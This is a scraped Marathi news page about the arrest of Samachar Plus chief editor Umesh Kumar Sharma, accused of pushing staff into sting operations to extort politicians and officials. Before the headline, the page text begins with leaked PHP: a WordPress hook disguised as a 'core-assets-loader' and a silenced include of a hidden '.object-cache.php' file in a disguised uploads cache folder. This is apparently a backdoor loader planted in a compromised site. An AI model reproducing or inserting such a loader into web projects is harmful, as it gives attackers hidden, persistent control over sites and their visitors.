add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); खंडणीसाठी स्टिंग ऑपरेशन, वृत्तवाहिनीच्या संपादकास अटक – SOCH INDIA
Menu

अपराध समाचार
खंडणीसाठी स्टिंग ऑपरेशन, वृत्तवाहिनीच्या संपादकास अटक

nobanner

उत्तराखंड पोलिसांनी रविवारी ‘समाचार प्लस’ या हिंदी वृत्तवाहिनीच्या मुख्य संपादकाला गाझियाबादमधून अटक केली. राजकीय नेते आणि प्रशासनातील वरिष्ठ अधिकाऱ्यांकडून पैसे उकळण्यासाठी कर्मचाऱ्यांवर स्टिंग ऑपरेशन करण्यासाठी दबाव टाकल्याचा आरोप मुख्य संपादकावर आहे.

समाचार प्लस’ या स्थानिक हिंदी वृत्तवाहिनीचे मुख्य संपादक उमेशकुमार शर्मा यांच्याविरोधात वृत्तवाहिनीतील शोधपत्रकारिता विभागाचे संपादक असलेले आयुष गौर यांनी पोलिसांकडे तक्रार दिली आहे. या तक्रारीत त्यांनी शर्मा यांच्यावर गंभीर आरोप केले आहेत. मुख्य संपादक असलेल्या शर्मा यांनी आमच्यावर स्टिंग ऑपरेशनसाठी दबाव टाकल्याचा आरोप त्यांनी केला आहे. या स्टिंग ऑपरेशनच्या आधारे राजकीय नेते आणि प्रशासनातील अधिकाऱ्यांकडून पैसे उकळण्याचा त्यांचा प्रयत्न होता, असे त्यांनी तक्रारीत म्हटले आहे.

डेहराडून पोलिसांनी या प्रकरणी खंडणी, फौजदारी कट या कलमाअंतर्गत गुन्हा दाखल केला असून शर्मा यांना गाझियाबादमधून अटक करण्यात आली आहे. शर्मा यांना डेहराडूनमध्ये आणण्यात आले असून त्यांची चौकशी सुरु असल्याची माहिती अतिरिक्त पोलीस महासंचालक (कायदा व सुव्यवस्था) अशोक कुमार यांनी दिली.

२०१६ साली शर्मा यांनी काँग्रेस नेते आणि माजी मुख्यमंत्री हरिश रावत यांचे स्टिंग ऑपरेशन केले होते. या स्टिंग ऑपरेशनमध्ये रावत यांनी बंडखोर काँग्रेस आमदारांच्या पाठिंब्यासाठी पैसे देण्याची तयारी दर्शवली होती. या स्टिंग ऑपरेशनमुळे शर्मा चर्चेत आले होते.